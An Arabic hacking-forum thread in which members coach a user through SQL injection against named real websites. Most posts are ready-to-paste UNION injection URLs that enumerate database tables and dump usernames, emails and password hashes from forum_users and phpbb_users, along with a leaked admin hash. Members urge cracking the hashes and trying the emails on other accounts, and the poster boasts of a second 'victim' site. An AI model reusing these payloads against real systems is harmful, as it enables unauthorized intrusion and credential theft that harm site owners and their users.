:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)

- - مساعدة (http://www.vbspiders.com/vb/showthread.php?t=41996)

[align=center]
أين عمود اليسير والباس هنا

نهاية الحقنة

http://www.skms.net/past.php?id=65%2...62636f646573--

smilies6[/align]

[[flash=align=center]هية المضكلة صعبة للدرجادى [/align]WIDTH=400 HEIGHT=350[/flash]]

[align=center]ممكن حد يقلى اية المشكلة [/align]

جرب تخمينات
user
pwd
وايضا استعمل السورس

اقتباس:

المشاركة الأصلية كتبت بواسطة hacker2020 (المشاركة 288763)

ما نفع
http://www.skms.net/past.php?id=65%2...orum_bbcodes--

لما تجي تطلع الجداول جرب تخمينات

http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,group_concat(username,0x3a,user_i d,0x3a,user_password),3,4,5+from+forum_users--

صحااا عبد الصمد

[align=center]اخى ممكن تكلمنى على لياهو دة املى لو مفيش مان
عبد الصمد
mr-ip
mr-tito-hack@att.net[/align]

اخي الكريم
تفضل هذي الحقنه نسخ ثم الصق فيرفوكس

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+unhex(hex(Group_concat(table_name,0x3a,column_name,0x3a,table_schema))),2,3,4,5+from+information_schema.columns+Where+table_name=0x666f72756d5f7573657273--

ابيك تجرب واحد واحد وبحث في الملفات كلها واحد واحد ممكن تحصل اشياء ثانية
وانا جربت حصلت لك هذا
وهذي الايميلات حلو تبحث فيهم

كود PHP:

   http://www.skms.net/past.php?id=65%20and%201=-0+union+select+Group_concat%28user_email,0x3a,user_passchg,0x3a,username%29,2,3,4,5+from+forum_users--

وانا ماحصلت ولوحه التحكم
واريد منك ان ترجع الدورة وتعمق فيها
فمان الرحمن
ارجو التقييم

لك من احلاة تقيم بس أريد شرح كامل اوك وشكرا على المجهود الجيد دة

خالد سعودي

اقتباس:

المشاركة الأصلية كتبت بواسطة خالد سعودي (المشاركة 288851)

اخي الكريم
تفضل هذي الحقنه نسخ ثم الصق فيرفوكس

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+unhex(hex(Group_concat(table_name,0x3a,column_name,0x3a,table_schema))),2,3,4,5+from+information_schema.columns+Where+table_name=0x666f72756d5f7573657273--

كود PHP:

   http://www.skms.net/past.php?id=65%20and%201=-0+union+select+Group_concat%28user_email,0x3a,user_passchg,0x3a,username%29,2,3,4,5+from+forum_users--

وانا ماحصلت ولوحه التحكم
واريد منك ان ترجع الدورة وتعمق فيها
فمان الرحمن
ارجو التقييم

السلام عليكم

أخي هدا user_passchg ليس عمود الباس
هدا هو user_password

شكرا لك
هده هي الحقنة ما عليك سوى أن تفك الهاشات وتجرب الإميلات قد تجد حسابات مهمة

http://www.skms.net/past.php?id=65%2...+forum_users--

بالتوفيق

تلسم ايدك mr-ip

ع فكرة السيرفر تقريبا كله مصاب

Mr-Ip
بارك الله فيك على جهود ياغالي تلخط ياغالي من الضمن الستا user_password وفي استعلامات كثير
smilies12

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+unhex(hex(Group_concat(table_name,0x3a,column_name,0x3a,table_schema))),2,3,4,5+from+information_schema.columns+Where+table_name=0x666f72756d5f7573657273--

لو تذكر كلامي الي الاخ hacker2020
ابيك تجرب واحد واحد وبحث في الملفات كلها واحد واحد ممكن تحصل اشياء ثانية ابيه يركز كثير في الحقن

اقدمك تحياتي

يعطيك العافية اخي خالد ومستر ايبي على مساعدة الاخ

[align=center]الله يعينكو علية[/align]

اقتباس:

المشاركة الأصلية كتبت بواسطة hacker2020 (المشاركة 288868)

لك من احلاة تقيم بس أريد شرح كامل اوك وشكرا على المجهود الجيد دة

خالد سعودي

ولايهمك ياغالي
ولكن تابع الدورة اوكي
يالله نبدا
بسم الله الرحمن الرحيم
من اصدارالقاعدة

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,version(),3,4,5+from+information_schema.columns--

بعدين نضع الامر هذا في مكان اصدار القاعدةversion()

كود PHP:

   concat(table_name,0x3a,column_name,0x3a,table_schema)

يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns--

تمام باقي علينا لباسبودWhere+column_name+LIKE باس مشفرة من فيرفوكس
الظاهر انك تعرف كيف تجيبه
يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

تلاحظ ان في الحقنه موجودGroup_ وهي تعرض الجميع لي في الجدوال
وطلع لك جميع لي في الجدوال وتبحث فيهم واحد واحد خينا ناخذ واحد منهو مثل phpbb_users
نشفيرها الموقع هذا وهو من الاساسيات

كود PHP:

   http://www.waraxe.us/sql-char-encoder.html

ممكن انك تعرف الموقع كيف يستخدام اذكانت ماتعرف قولي واحسن شي انك التابع الدورة sql في المنتدي وتركز فيها
يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+table_name=0x70687062625f7573657273--

طلعتلك الستا تجرب فيهم علما user_id عضو مافي فائدة منه تبحث عن الباسورد او اليوز نيم من هذا قبيل
خلينا ناخذ واحد منهم username+user_password

يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(username,0x3a,user_password),3,4,5+from+phpbb_users--

admin:61b19b269cc521c8e15bbadb4dfe49a7
انا حولت فك الباس ولكن ما فك معي
:a14: والله طلع من الاختبارات وكتبت الموضوع وانااسف على التاخير يا غالي
في النهاية تتركك في فمان الرحمن ولكن كم اقولك تابع الدورة في المنتدي وركز عليه
تقييم

[align=center]والله فى الاول انا احب اشكر الاخوة عبد الصمد-mr-ip-خالد سعودى على المعلمات القيمة دة

وبلنسبة لكلامك اخلا خالد سعودى انتا والله انسان تستحق التقدير انتا وباقى المشرفين والاعضاء

وانا هتابع الدورة ولية باك بس اتمنة تشرفونى على الاميل بتاع وشكرا اخوااانى على المجهود دة[/align]

[align=center]ولكم باك على احلاة ناس

كلامك طلع صح ودى النتيجة

http://www.orthops.si/clanki-ona.php?id=65 and 1=-0+union+select+concat(username,0x3a,password),2,3+ from+uporabniki--[/align]

اقتباس:

المشاركة الأصلية كتبت بواسطة hacker2020 (المشاركة 289462)

مبدع ياغالي ولكن لوانك كاتب الموضوع في قسم الانجازات
موفق

[align=center]أوك اومرك بس ضحية تانية[/align]